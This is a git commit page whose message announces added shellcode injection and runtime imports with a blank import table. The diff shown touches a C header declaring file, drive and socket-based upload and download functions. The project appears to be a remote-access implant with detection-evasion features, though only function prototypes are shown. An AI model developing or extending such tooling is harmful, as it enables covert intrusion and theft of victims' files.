fix: bugs & msvcrt dependencies, add: shellcode injection, runtime imports (blank IAT)

This commit is contained in:
2024-07-06 13:39:48 +02:00
parent d1ea71557d
commit 17e998b801
16 changed files with 669 additions and 374 deletions

View File

@@ -14,9 +14,10 @@
extern API Api;
int get_object_info(char* path, struct stat* fileinfo);
char get_obj_info(const char* dirPath);
int get_drives_list(char* buf);
BOOL delete_folder(LPCTSTR lpszDir);
char* get_file_list(const char* dirPath, int* numFiles);
int download_file(FILE* fp, SOCKET sock);
void upload_file(SOCKET sock, HANDLE file_handle);
int download_file(HANDLE fp, SOCKET sock);
void upload_file(SOCKET sock, HANDLE file_handle);
char* upload_file_to_mem(SOCKET sock, size_t *total_bytes);